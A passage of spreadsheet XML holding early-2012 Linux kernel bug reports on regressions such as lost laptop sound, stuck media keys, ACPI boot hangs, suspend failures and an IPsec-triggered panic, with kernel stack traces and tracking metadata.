831.250048] [&lt;ffffffff810f4401&gt;] ? fget_light+0x5f/0x73 Jan 16 01:00:05 WZLap kernel: [ 831.250051] [&lt;ffffffff8125a06d&gt;] ? sys_sendto+0x108/0x137 Jan 16 01:00:05 WZLap kernel: [ 831.250054] [&lt;ffffffff810f4401&gt;] ? fget_light+0x5f/0x73 Jan 16 01:00:05 WZLap kernel: [ 831.250057] [&lt;ffffffff8125a392&gt;] ? sys_sendmsg+0x39/0x58 Jan 16 01:00:05 WZLap kernel: [ 831.250061] [&lt;ffffffff81329712&gt;] ? system_call_fastpath+0x16/0x1b Jan 16 01:00:05 WZLap kernel: [ 831.250063] ---[ end trace 8c75c33e0520ab5a ]--- Jan 16 01:00:07 WZLap kernel: Kernel logging (proc) stopped.</t>
  </si>
  <si>
    <t>No more sound on dell Latitude E6410 (3.2.x KO, 3.1.x ok)</t>
  </si>
  <si>
    <t>3.2.1</t>
  </si>
  <si>
    <t>2012-01-23 12:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 72154 [details] alsainfo output Can have sound in my audi headphone or speakers on my dell since kernel 3.2.0. The same user space work with 3.1.x kernel.</t>
  </si>
  <si>
    <t>Regression 3.2 -&gt; 3.3-rc1 commit b4b583d4 inet/media keyboard: stuck "extra" keys</t>
  </si>
  <si>
    <t>3.3-rc1</t>
  </si>
  <si>
    <t>2012-01-24 18:18 UTC</t>
  </si>
  <si>
    <t>2012-03-11 21:29 UTC</t>
  </si>
  <si>
    <t>I just bisected a regression down to: commit b4b583d4e9a5ff28c4a150bb25a4fff5cd4dfbbd Author: Jiri Kosina &lt;jkosina@suse.cz&gt; Date: Mon Oct 31 16:26:22 2011 +0100 HID: be more strict when ignoring out-of-range fields I have a logitech USB keyboard with extra inet/media keys. In kde I have them configured to launch various utilities. With this commit, these keys will "stick", and instead of a single konsole window or krunner dialog or whatever, it continues launching konsoles or toggling the krunner dialog on and off. Switching to a text VT and killing X gets me the system back, but of course without X, and launching X/KDE over again results in unresponsive hotkeys. Apparently, one of these "out of range" fields translates to a key-release for at least some of the extra keys, without which they stay pressed and auto-repeat. gentoo/amd64 system, logitech wireless usb keyboard, kde 4.7.97 (aka 4.8-rc2), xf86-evdev-2.6.0, xorg-server-1.11.3. I can attach .config later (headed to work now).</t>
  </si>
  <si>
    <t>ALC861 HD Audio on ATI IXP SB4x0 stopped working from 3.1.x to 3.2.x</t>
  </si>
  <si>
    <t>2012-01-25 20:51 UTC</t>
  </si>
  <si>
    <t>richardt</t>
  </si>
  <si>
    <t>2012-06-13 15:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 72192 [details] output from alsa-info.sh from kernel 3.1.10 After I've upgraded my kernel from 3.1.0 to 3.2.x, I have lost sound on my Haier W18 (ancient) laptop. All kernel from 3.1.x work fine, whereas kernels 3.2.x and 3.3-rc1 fail to work. All sound players (aplay, mplayer) run fine without any errors, but there's just no sound. Userspace is alsa-base 1.0.23+dfsg-4 from debian sid (i386). There's no difference whether the sound drivers are compiled as modules or in the directly in the kernel. Initial contact with tiwai shows that this is similar to #42588 https://bugzilla.kernel.org/show_bug.cgi?id=42588</t>
  </si>
  <si>
    <t>3.3-rc1: compiling problems  nvme , l2cap_sock , mc13892-regulator , and snd-pcsp don't work</t>
  </si>
  <si>
    <t>2012-01-27 15:43 UTC</t>
  </si>
  <si>
    <t>2012-02-23 23:25 UTC</t>
  </si>
  <si>
    <t>Subject : 3.3-rc1: compiling problems nvme , l2cap_sock , mc13892-regulator , and snd-pcsp don't work Submitter : "werner" &lt;w.landgraf@ru.ru&gt; Date : 2012-01-20 18:52 Message-ID : web-682421181@zbackend1.aha.ru References : http://marc.info/?l=linux-kernel&amp;m=132708923719565&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kworker thread eating CPU time in 3.3-rc1</t>
  </si>
  <si>
    <t>2012-01-27 16:00 UTC</t>
  </si>
  <si>
    <t>2012-01-28 15:07 UTC</t>
  </si>
  <si>
    <t>Subject : kworker thread eating CPU time in 3.3-rc1 Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2012-01-20 4:33 Message-ID : 20120120043324.GA9929@gamma.logic.tuwien.ac.at References : http://marc.info/?l=linux-kernel&amp;m=132703542302151&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drivers/dma/iop-adma.c: Buffer access out-of-bounds</t>
  </si>
  <si>
    <t>2012-01-28 10:18 UTC</t>
  </si>
  <si>
    <t>I just tried out cppcheck-1.52 on the linux-3.3-rc1 source code. It said [drivers/dma/iop-adma.c:1359]: (error) Buffer access out-of-bounds: pq_src [drivers/dma/iop-adma.c:1391]: (error) Buffer access out-of-bounds: pq_src The source code is for (i = 0; i &lt; IOP_ADMA_NUM_SRC_TEST + 2; i++) pq_src[i] = dma_map_page(dev, pq[i], 0, PAGE_SIZE, DMA_TO_DEVICE); So arrays pq_src and pq have to have the same number of elements. But struct page *pq[IOP_ADMA_NUM_SRC_TEST+2+2]; and dma_addr_t pq_src[IOP_ADMA_NUM_SRC_TEST]; so pq has four more elements in it. Suggest code rework.</t>
  </si>
  <si>
    <t>WARN... Device 'cpu1' does not have a release() function, it is broken and must be fixed. when doing 'xl vcpu-set &lt;guest_id&gt; 1'</t>
  </si>
  <si>
    <t>2012-01-29 09:21 UTC</t>
  </si>
  <si>
    <t>2012-03-05 19:00 UTC</t>
  </si>
  <si>
    <t>Subject : WARN... Device 'cpu1' does not have a release() function, it is broken and must be fixed. when doing 'xl vcpu-set &lt;guest_id&gt; 1' Submitter : Konrad Rzeszutek Wilk &lt;konrad.wilk@oracle.com&gt; Date : 2012-01-23 18:06 Message-ID : 20120123180601.GA24553@phenom.dumpdata.com References : http://marc.info/?l=linux-kernel&amp;m=132734233916154&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>multi-media key "mute" no longer recognized</t>
  </si>
  <si>
    <t>2012-01-29 09:38 UTC</t>
  </si>
  <si>
    <t>2012-03-06 18:54 UTC</t>
  </si>
  <si>
    <t>Subject : multi-media key "mute" no longer recognized Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2012-01-23 10:52 Message-ID : 201201231152.25344.toralf.foerster@gmx.de References : http://marc.info/?l=linux-kernel&amp;m=132731613606121&amp;w=2 This entry is being used for tracking a regression from 3.1. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>crash or "list_del corruption. prev-&gt;next should be .. but was (null)" after resume from hibernation</t>
  </si>
  <si>
    <t>3.2.2-1.fc16.x86_64</t>
  </si>
  <si>
    <t>2012-01-30 08:22 UTC</t>
  </si>
  <si>
    <t>Arne Woerner</t>
  </si>
  <si>
    <t>2012-05-04 17:01 UTC</t>
  </si>
  <si>
    <t>Created attachment 72224 [details] syslog messages sometimes it even crashes when i log out from my gnome session... but resume from hibernation or suspend crashes more often (30%)... i use Fedora Core 16 on an Asrock H61M-ITX with an Intel Core i7-2600K with no 2nd graphix card... maybe it is not hibernate/suspend related? i cant say if it is a new bug, because the box is new... i play SecondLife a lot with the /usr/lib64/xorg/modules/drivers/intel_drv.so and onboard audio driver (HDMI and analog-stereo)... Linux version 3.2.2-1.fc16.x86_64 (mockbuild@x86-13.phx2.fedoraproject.org) (gcc version 4.6.2 20111027 (Red Hat 4.6.2-1) (GCC) ) #1 SMP Thu Jan 26 03:21:58 UTC 2012</t>
  </si>
  <si>
    <t>Wrong ACPI handle is being detected for NVIDIA graphics card on Lenovo Ideapad Y470/Y570</t>
  </si>
  <si>
    <t>3.3.7</t>
  </si>
  <si>
    <t>2012-01-30 18:48 UTC</t>
  </si>
  <si>
    <t>Peter Wu</t>
  </si>
  <si>
    <t>2013-10-06 08:59 UTC</t>
  </si>
  <si>
    <t>On the Lenovo Ideapad Y470 and Lenovo Ideapad Y570, the kernel assigns the \_SB.PCI0.PEG0.VGA handle to the PCI device (possibly because the _DOS method is found on the handle?) However, the correct _DSM, _ROM, _PS0 and _PS3 can be found on the \_SB.PCI0.PEG0.PEGP handle. _PSx on the VGA handle is basically a no-op, it only gets/sets the _PSC variable. _ROM does not exist and the _DSM method is not useful comparing it to the PEGP._DSM method. Due to this issue, the nouveau driver fails to load the vbios (because _ROM does not exist on VGA). Similarly, the proprietary nvidia driver fails to load. As for the _PS0 and _PS0 methods, using the pci_set_power_state methods does not really disable the PCI device.</t>
  </si>
  <si>
    <t>Kernel won't boot on D102GGC2 board unless ACPI=off or idle=halt</t>
  </si>
  <si>
    <t>3.*</t>
  </si>
  <si>
    <t>2012-01-31 05:55 UTC</t>
  </si>
  <si>
    <t>Waleed Hamra</t>
  </si>
  <si>
    <t>2012-06-18 19:28 UTC</t>
  </si>
  <si>
    <t>this is a kubuntu 32-bit system. in kubuntu 11.04, they were using the 2.6 kernel still, and the system was booting fine, up to the last kernel tried on that release: willy@Hamra:~$ uname -r 2.6.38-12-generic after upgrade to 11.10, ubuntu started using the 3.0 kernel, which won't boot on this board, unless ACPI=off was specified. but this, of course, removes all ACPI functionality, and disables hyper threading, effectively halving the processing power. kernels tried as shipped by ubuntu: willy@Hamra:~$ ls -1 /boot/vmlinuz-3.0* /boot/vmlinuz-3.0.0-13-generic /boot/vmlinuz-3.0.0-14-generic /boot/vmlinuz-3.0.0-15-generic /boot/vmlinuz-3.0.0-16-generic so i tried compiling a linux kernel from last month's 3.1 tree, to check if this is an ubuntu issue or a kernel issue. i used very close values to what i would normally use on my LinuxFromScratch and ended with same bug. then i brought the config of the 2.6.38-12-generic kernel provided by ubuntu, and used it as starting point for configuring the 3.1 kernel. i just ran the configuration program so it can remove obsolete options, and add necessary new ones, didnt modify anything myself, and compiled, again, same result, system won't boot. the stage of booting at which this issue happens is after these lines in the boot process: [ 0.285128] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 [ 0.285432] input: Power Button as /devices/LNXSYSTM:00/device:00/PNP0C0C:00/input/input0 [ 0.285443] ACPI: Power Button [PWRB] [ 0.285571] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input1 [ 0.285579] ACPI: Power Button [PWRF] after the last PWRF line the system just hangs. no panic, no flashing keyboard LEDs, and no response at all. judging by the speed of fans, it doesnt seem the processor is stuck in an intensive infinite loop either. normally, on a 2.6 kernel, the lines following these are: [ 0.285849] ACPI: acpi_idle registered with cpuidle [ 0.287994] ERST: Table is not found! [ 0.288199] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled [ 0.292073] isapnp: Scanning for PnP cards... hope this is enough info to be able to debug this issue. a launchpad bug report has been filed as well: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/883441 thanks in advance</t>
  </si>
  <si>
    <t>Hang deconfiguring network interface (in shutdown) on 3.3-rc1</t>
  </si>
  <si>
    <t>2012-01-31 20:14 UTC</t>
  </si>
  <si>
    <t>2012-03-05 19:57 UTC</t>
  </si>
  <si>
    <t>Subject : Hang deconfiguring network interface (in shutdown) on 3.3-rc1 Submitter : James Bottomley &lt;James.Bottomley@hansenpartnership.com&gt; Date : 2012-01-28 19:56 Message-ID : 1327780565.2924.24.camel@dabdike.int.hansenpartnership.com References : http://marc.info/?l=linux-kernel&amp;m=132778076214873&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ultrabook not able to turn on after failed suspend, EHCI workaround - Asus Zenbook UX31E</t>
  </si>
  <si>
    <t>2012-02-04 18:03 UTC</t>
  </si>
  <si>
    <t>2013-03-06 20:12 UTC</t>
  </si>
  <si>
    <t>Hardware: Asus Zenbook UX31E, CPU i7-2677M, QS67, 4G RAM kernel version: i use current git 3.3.0-rc2-00110-gd125666, but i was also able to reproduce it with 3.2.0 Steps to reproduce: - suspend it. with gui and distribution related wrappers, or just set: "echo mem &gt; /sys/power/state" - it will freeze with blak screene and not blinking cursor on top left. i also not able to access it over ssh. - force power off. hold power button untill it goes off. - try to turn it on again. at this stage i get most problems. linux or windos can't start. windows get BSOD, linux get random kernel panics. memtest show many corrupted memory blocks. even harddrive controller seems to be corrupt (there is SSD drive insight) the battary is build in, this is why not able to remove power completly. some times i can get linux to start, but i get some grafick artifacts. Only after i get windows to start every thing goes to normal. memtest show no more corrupt memory blocks, and linux works just fine. Please do not ask me do bisect. It is too hard to get it work again. If i will have some magick kernel parametr or patch wich will help me restore to working configuration i can start doing testing.</t>
  </si>
  <si>
    <t>ACPI suspend to disk no longer functions when USB key is present - Lenovo ThinkPad T510</t>
  </si>
  <si>
    <t>3.2.4</t>
  </si>
  <si>
    <t>2012-02-04 21:28 UTC</t>
  </si>
  <si>
    <t>rds1944</t>
  </si>
  <si>
    <t>2012-03-12 22:30 UTC</t>
  </si>
  <si>
    <t>Am now using kernel 3.1 without problems. echo disk &gt; /sys/power/state works fine. It does NOT work in any of the 3.2.x series. Attached is my syslog from the latest experiment with 3.2.4. Using Slackware 13.37 on a Lenovo ThinkPad T510.</t>
  </si>
  <si>
    <t>Regression 3.2 -&gt; 3.3-rc1 10 sec hang at boot and resume, COMRESET failed</t>
  </si>
  <si>
    <t>2012-02-05 19:07 UTC</t>
  </si>
  <si>
    <t>2012-05-14 14:18 UTC</t>
  </si>
  <si>
    <t>Subject : Regression 3.2 -&gt; 3.3-rc1 10 sec hang at boot and resume, COMRESET failed Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2012-02-02 5:12 Message-ID : 20120202051258.GA15550@gamma.logic.tuwien.ac.at References : http://marc.info/?l=linux-kernel&amp;m=132815978615112&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>dosemu graphics broken in v3.3-rc1</t>
  </si>
  <si>
    <t>2012-02-05 19:10 UTC</t>
  </si>
  <si>
    <t>2012-03-03 09:59 UTC</t>
  </si>
  <si>
    <t>Subject : dosemu graphics broken in v3.3-rc1 Submitter : Hans de Bruin &lt;jmdebruin@xmsnet.nl&gt; Date : 2012-02-02 22:25 Message-ID : 4F2B0D4D.3000304@xmsnet.nl References : http://marc.info/?l=linux-kernel&amp;m=132825899111982&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kobject (ffff88003ffbb4b8): tried to init an initialized object, something is seriously wrong.</t>
  </si>
  <si>
    <t>3.3-rc2</t>
  </si>
  <si>
    <t>2012-02-05 19:30 UTC</t>
  </si>
  <si>
    <t>2012-02-25 21:19 UTC</t>
  </si>
  <si>
    <t>Subject : kobject (ffff88003ffbb4b8): tried to init an initialized object, something is seriously wrong. Submitter : Konrad Rzeszutek Wilk &lt;konrad.wilk@oracle.com&gt; Date : 2012-02-03 20:59 Message-ID : 20120203205953.GA2897@phenom.dumpdata.com References : http://marc.info/?l=linux-kernel&amp;m=132830315526901&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Ralink RT2860 poor perfomance in AP mode since 2.6.38 (2.6.37 works OK)</t>
  </si>
  <si>
    <t>Since 2.6.38</t>
  </si>
  <si>
    <t>2012-02-05 21:48 UTC</t>
  </si>
  <si>
    <t>Andrei Marinache</t>
  </si>
  <si>
    <t>2012-08-10 17:04 UTC</t>
  </si>
  <si>
    <t>It's my first kernel bug report, so please excuse me if anything is wrong. I will provide any more details if you ask. OS: Slackware 13.1.0 Network card: Edimax 300mbps EW-7728In PCI ( http://www.edimax.com/en/produce_detail.php?pd_id=225&amp;pl1_id=1&amp;pl2_id=44 ) [ 339.120603] rt2800pci 0000:01:08.0: PCI INT A -&gt; Link[LNK1] -&gt; GSI 7 (level, low) -&gt; IRQ 7 [ 339.128532] phy0 -&gt; rt2x00_set_chip: Info - Chipset detected - rt: 2860, rf: 0001, rev: 0102. [ 341.020636] phy0 -&gt; rt2x00lib_request_firmware: Info - Firmware detected - version: 0.26. Network card set in AP mode Client: Windows 7 machine, 300mbps USB network card, TP-Link TL-WN821N ( http://www.tp-link.com/en/products/details/?categoryid=240&amp;model=TL-WN821N ) With 2.6.37 i get up to 14MBytes/sec throughput when copying files from the linux server on windows machine (samba server on linux) Starting with 2.6.38 I can't get more than 4MBytes/sec. I've tried a lot of kernel versions, even 3.2.4 and 3.3-rc2 I've started trying compat-wireless and found the following: With compat-wireless-2011-01-30 everything works ok Starting with the next version, compat-wireless-2011-02-10 the speed drops. I've tried to find the problem, but the differences between these two versions are huge: # tar xjvf ../compat-wireless-2011-01-30.tar.bz2 # tar xjvf ../compat-wireless-2011-02-10.tar.bz2 # diff -uNr compat-wireless-2011-01-30/ compat-wireless-2011-02-10/ &gt; patch # ls -al patch -rw-r--r-- 1 root root 8529711 2012-02-05 23:40 patch With compat-wireless-2011-02-10: # iwconfig wlan0 power off Error for wireless request "Set Power Management" (8B2C) : SET failed on device wlan0 ; Invalid argument. Also, with 2.6.37 vanilla I get the same performance drop if I modify the following options: A) Preemption model - No forced preemption (server) Timer frequency - 300 Hz up to 14MBytes of throughput B) Preemption model - Preemptible kernel (low-latency desktop) Timer frequency - 1000 Hz up to 4MBytes of throughput All other tests (with compat-wireless) were made with A options (no forced preemption, 300Hz) Please, ask for any details you think it may help, I will provide them as fast as possible.</t>
  </si>
  <si>
    <t>Dell Precision M6600 laptop doesn't reboot on kernel 3.2</t>
  </si>
  <si>
    <t>3.2.5</t>
  </si>
  <si>
    <t>2012-02-09 13:09 UTC</t>
  </si>
  <si>
    <t>tblanchard.bug</t>
  </si>
  <si>
    <t>2012-07-14 15:32 UTC</t>
  </si>
  <si>
    <t>Created attachment 72334 [details] dmesg Laptop's name : Dell Inc. Precision M6600 Reboot stopped working with kernel 3.2. Adding reboot=pci fixes reboot. I guess a patch would look like that : https://github.com/mirrors/linux-2.6/commit/6be30bb7d7504ec687a65c9bbdae8d1d2f8eaa19#arch/x86/kernel/reboot.c</t>
  </si>
  <si>
    <t>rtl8192cu: sleeping function called from invalid context</t>
  </si>
  <si>
    <t>2012-02-15 16:12 UTC</t>
  </si>
  <si>
    <t>Ronald Wahl</t>
  </si>
  <si>
    <t>2012-07-02 17:25 UTC</t>
  </si>
  <si>
    <t>There are some issues when using the rtl8192cu wireless driver in kernel 3.2.5: Especially when loading with parameter debug=4 I get some traces about sleeping function called from invalid context: (1) This one is because the rcu_read_lock is held in rtl92c_dm_refresh_rate_adaptive_mask() and can be fixed locally in the driver BUG: sleeping function called from invalid context at mm/slub.c:935 in_atomic(): 1, irqs_disabled(): 0, pid: 128, name: kworker/0:1 [&lt;c000e158&gt;] (unwind_backtrace+0x0/0x12c) from [&lt;c02db684&gt;] (dump_stack+0x20/0x24) [&lt;c02db684&gt;] (dump_stack+0x20/0x24) from [&lt;c0017238&gt;] (__might_sleep+0x104/0x124) [&lt;c0017238&gt;] (__might_sleep+0x104/0x124) from [&lt;c00b123c&gt;] (kmem_cache_alloc_trace+0x4c/0x1f0) [&lt;c00b123c&gt;] (kmem_cache_alloc_trace+0x4c/0x1f0) from [&lt;bf20b398&gt;] (_usb_read_sync+0x40/0xd0 [rtlwifi]) [&lt;bf20b398&gt;] (_usb_read_sync+0x40/0xd0 [rtlwifi]) from [&lt;bf20b44c&gt;] (_usb_read32_sync+0x24/0x28 [rtlwifi]) [&lt;bf20b44c&gt;] (_usb_read32_sync+0x24/0x28 [rtlwifi]) from [&lt;bf2a0be4&gt;] (rtl92cu_update_hal_rate_table+0x1c8/0x210 [rtl8192cu]) [&lt;bf2a0be4&gt;] (rtl92cu_update_hal_rate_table+0x1c8/0x210 [rtl8192cu]) from [&lt;bf21e950&gt;] (rtl92c_dm_watchdog+0x10ec/0x1390 [rtl8192c_common]) [&lt;bf21e950&gt;] (rtl92c_dm_watchdog+0x10ec/0x1390 [rtl8192c_common]) from [&lt;bf200484&gt;] (rtl_watchdog_wq_callback+0x2ec/0x320 [rtlwifi]) [&lt;bf200484&gt;] (rtl_watchdog_wq_callback+0x2ec/0x320 [rtlwifi]) from [&lt;c00398c4&gt;] (process_one_work+0x294/0x474) [&lt;c00398c4&gt;] (process_one_work+0x294/0x474) from [&lt;c003c0a8&gt;] (worker_thread+0x214/0x344) [&lt;c003c0a8&gt;] (worker_thread+0x214/0x344) from [&lt;c0040330&gt;] (kthread+0x94/0x9c) [&lt;c0040330&gt;] (kthread+0x94/0x9c) from [&lt;c0009eec&gt;] (kernel_thread_exit+0x0/0x8) (2) This one is because a lock is held in the mac80211 layer BUG: sleeping function called from invalid context at mm/slub.c:935 in_atomic(): 1, irqs_disabled(): 0, pid: 11580, name: kworker/u:2 [&lt;c000e158&gt;] (unwind_backtrace+0x0/0x12c) from [&lt;c02db684&gt;] (dump_stack+0x20/0x24) [&lt;c02db684&gt;] (dump_stack+0x20/0x24) from [&lt;c0017238&gt;] (__might_sleep+0x104/0x124) [&lt;c0017238&gt;] (__might_sleep+0x104/0x124) from [&lt;c00b123c&gt;] (kmem_cache_alloc_trace+0x4c/0x1f0) [&lt;c00b123c&gt;] (kmem_cache_alloc_trace+0x4c/0x1f0) from [&lt;bf459398&gt;] (_usb_read_sync+0x40/0xd0 [rtlwifi]) [&lt;bf459398&gt;] (_usb_read_sync+0x40/0xd0 [rtlwifi]) from [&lt;bf45944c&gt;] (_usb_read32_sync+0x24/0x28 [rtlwifi]) [&lt;bf45944c&gt;] (_usb_read32_sync+0x24/0x28 [rtlwifi]) from [&lt;bf486c04&gt;] (rtl92cu_update_hal_rate_table+0x1e8/0x24c [rtl8192cu]) [&lt;bf486c04&gt;] (rtl92cu_update_hal_rate_table+0x1e8/0x24c [rtl8192cu]) from [&lt;bf451830&gt;] (rtl_op_sta_add+0x114/0x13c [rtlwifi]) [&lt;bf451830&gt;] (rtl_op_sta_add+0x114/0x13c [rtlwifi]) from [&lt;bf0bd4d0&gt;] (sta_info_finish_insert+0x80/0x204 [mac80211]) [&lt;bf0bd4d0&gt;] (sta_info_finish_insert+0x80/0x204 [mac80211]) from [&lt;bf0bdb18&gt;] (sta_info_insert_non_ibss+0x108/0x140 [mac80211]) [&lt;bf0bdb18&gt;] (sta_info_insert_non_ibss+0x108/0x140 [mac80211]) from [&lt;bf0bdfc0&gt;] (sta_info_reinsert+0x4c/0x78 [mac80211]) [&lt;bf0bdfc0&gt;] (sta_info_reinsert+0x4c/0x78 [mac80211]) from [&lt;bf0c7d4c&gt;] (ieee80211_assoc_success+0x474/0x7c0 [mac80211]) [&lt;bf0c7d4c&gt;] (ieee80211_assoc_success+0x474/0x7c0 [mac80211]) from [&lt;bf0c81c0&gt;] (ieee80211_assoc_done+0x128/0x1e4 [mac80211]) [&lt;bf0c81c0&gt;] (ieee80211_assoc_done+0x128/0x1e4 [mac80211]) from [&lt;bf0c98a8&gt;] (ieee80211_work_work+0x2c0/0x11c0 [mac80211]) [&lt;bf0c98a8&gt;] (ieee80211_work_work+0x2c0/0x11c0 [mac80211]) from [&lt;c00398c4&gt;] (process_one_work+0x294/0x474) [&lt;c00398c4&gt;] (process_one_work+0x294/0x474) from [&lt;c003c0a8&gt;] (worker_thread+0x214/0x344) [&lt;c003c0a8&gt;] (worker_thread+0x214/0x344) from [&lt;c0040330&gt;] (kthread+0x94/0x9c) [&lt;c0040330&gt;] (kthread+0x94/0x9c) from [&lt;c0009eec&gt;] (kernel_thread_exit+0x0/0x8) I can't tell if these are regressions since I just started to test the driver with that kernel.</t>
  </si>
  <si>
    <t>OF-related boot crash in 3.3.0-rc3-00188-g3ec1e88</t>
  </si>
  <si>
    <t>3.3-rc3</t>
  </si>
  <si>
    <t>2012-02-15 19:15 UTC</t>
  </si>
  <si>
    <t>2012-03-12 23:33 UTC</t>
  </si>
  <si>
    <t>Subject : OF-related boot crash in 3.3.0-rc3-00188-g3ec1e88 Submitter : Meelis Roos &lt;mroos@linux.ee&gt; Date : 2012-02-13 7:45 Message-ID : alpine.SOC.1.00.1202130942030.1488@math.ut.ee References : http://marc.info/?l=linux-kernel&amp;m=132911916331615&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel panic when receiving an ipsec packet</t>
  </si>
  <si>
    <t>2.6.32.54</t>
  </si>
  <si>
    <t>2012-02-22 10:24 UTC</t>
  </si>
  <si>
    <t>darkbasic</t>
  </si>
  <si>
    <t>2012-05-12 02:13 UTC</t>
  </si>
  <si>
    <t>As soon as I receive an ipsec packet (NETKEY of course) I get a kernel panic. Even magicsysrq keys do not work anymore. O.S. Debian Squeeze amd64. I tried both Strongswan and Openswan. [ 135.642460] BUG: unable to handle kernel paging request at ffff8802aef2fbff [ 135.649876] IP: [&lt;ffffffff81196213&gt;] memmove+0xf/0x3c [ 135.655282] PGD 1002063 PUD 0 [ 135.658629] Thread overran stack, or stack corrupted [ 135.663781] Oops: 0000 [#1] SMP [ 135.667275] last sysfs file: /sys/module/zlib_deflate/initstate [ 135.673380] CPU 0 [ 135.675606] Modules linked in: authenc deflate ctr camellia cast5 rmd160 sha1_generic hmac crypto_null ccm serpent blowfish twofish twofish_common ecb xcbc cbc sha256_generic s] [ 135.813814] Pid: 0, comm: swapper Not tainted 2.6.32-5-amd64 #1 To Be Filled By O.E.M. [ 135.822044] RIP: 0010:[&lt;ffffffff81196213&gt;] [&lt;ffffffff81196213&gt;] memmove+0xf/0x3c [ 135.829956] RSP: 0018:ffff880007203ca0 EFLAGS: 00010293 [ 135.835539] RAX: ffff8801aef2fc00 RBX: ffff8801b035d700 RCX: 0000000000000009 [ 135.842994] RDX: 0000000000000009 RSI: ffff8802aef2fbff RDI: ffff8801aef2fc33 [ 135.850384] RBP: ffff8801b035d738 R08: 0000000000000000 R09: ffff8801aef2fc33 [ 135.857791] R10: ffff8801aec8f178 R11: ffffffffa048e0ef R12: ffff8801aec8f800 [ 135.865149] R13: 0000000000000002 R14: 0000000000000004 R15: 0000000000000000 [ 135.872575] FS: 0000000000000000(0000) GS:ffff880007200000(0000) knlGS:0000000000000000 [ 135.885892] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b [ 135.891902] CR2: ffff8802aef2fbff CR3: 00000001aa4fb000 CR4: 00000000000006f0 [ 135.899362] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 135.906857] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 135.914239] Process swapper (pid: 0, threadinfo ffffffff8142e000, task ffffffff814891f0) [ 135.922570] Stack: [ 135.924726] ffff8801b035d700 ffffffffa048e254 ffff8801aec8f800 ffff8801b035d700 [ 135.932479] &lt;0&gt; 0000000000000004 ffffffff812b0ab6 9411941100000011 ffffffff816d35b0 [ 135.940803] &lt;0&gt; e940ab4d00000000 ea5d2cd94b9e8da7 01000000a6e1ad80 ffff8801aaf71040 [ 135.949461] Call Trace: [ 135.952060] &lt;IRQ&gt; [ 135.954349] [&lt;ffffffffa048e254&gt;] ? xfrm4_mode_tunnel_input+0x165/0x189 [xfrm4_mode_tunnel] [ 135.963057] [&lt;ffffffff812b0ab6&gt;] ? xfrm_input+0x26f/0x386 [ 135.968743] [&lt;ffffffff8129340c&gt;] ? udp_queue_rcv_skb+0x56/0x201 [ 135.974993] [&lt;ffffffff81293993&gt;] ? __udp4_lib_rcv+0x3dc/0x5e7 [ 135.981097] [&lt;ffffffff81273896&gt;] ? ip_local_deliver_finish+0x0/0x1e9 [ 135.987814] [&lt;ffffffff812739dc&gt;] ? ip_local_deliver_finish+0x146/0x1e9 [ 135.994684] [&lt;ffffffff8127352b&gt;] ? ip_rcv_finish+0x373/0x38d [ 136.000639] [&lt;ffffffff812737e5&gt;] ? ip_rcv+0x2a0/0x2ed [ 136.006026] [&lt;ffffffff8124fb55&gt;] ? process_backlog+0x81/0xb4 [ 136.011963] [&lt;ffffffff8125013b&gt;] ? net_rx_action+0xae/0x1c9 [ 136.017817] [&lt;ffffffff81053dc7&gt;] ? __do_softirq+0xdd/0x1a6 [ 136.023590] [&lt;ffffffff81011cac&gt;] ? call_softirq+0x1c/0x30 [ 136.029322] [&lt;ffffffff8101322b&gt;] ? do_softirq+0x3f/0x7c [ 136.034844] [&lt;ffffffff81053c37&gt;] ? irq_exit+0x36/0x76 [ 136.040185] [&lt;ffffffff81012922&gt;] ? do_IRQ+0xa0/0xb6 [ 136.045347] [&lt;ffffffff810114d3&gt;] ? ret_from_intr+0x0/0x11 [ 136.051026] &lt;EOI&gt; [ 136.053318] [&lt;ffffffff810176a4&gt;] ? mwait_idle+0x72/0x7d [ 136.058857] [&lt;ffffffff81017654&gt;] ? mwait_idle+0x22/0x7d [ 136.064349] [&lt;ffffffff8100fe97&gt;] ? cpu_idle+0xa2/0xda [ 136.069708] [&lt;ffffffff8151c140&gt;] ? early_idt_handler+0x0/0x71 [ 136.075743] [&lt;ffffffff8151ccdd&gt;] ? start_kernel+0x3dc/0x3e8 [ 136.081559] [&lt;ffffffff8151c3b7&gt;] ? x86_64_start_kernel+0xf9/0x106 [ 136.087974] Code: 17 0f 1f 80 00 00 00 00 44 8a 06 44 88 07 48 ff c7 48 ff c6 ff c9 75 f0 c3 90 90 90 48 83 ec 08 48 39 f7 49 89 f9 48 89 d1 73 04 &lt;f3&gt; a4 eb 1d 4c 8d 04 17 48 [ 136.111424] RIP [&lt;ffffffff81196213&gt;] memmove+0xf/0x3c [ 136.116814] RSP &lt;ffff880007203ca0&gt; [ 136.120428] CR2: ffff8802aef2fbff [ 136.123877] ---[ end trace a549686a4982f42d ]--- [ 136.128728] Kernel panic - not syncing: Fatal exception in interrupt [ 136.135363] Pid: 0, comm: swapper Tainted: G D 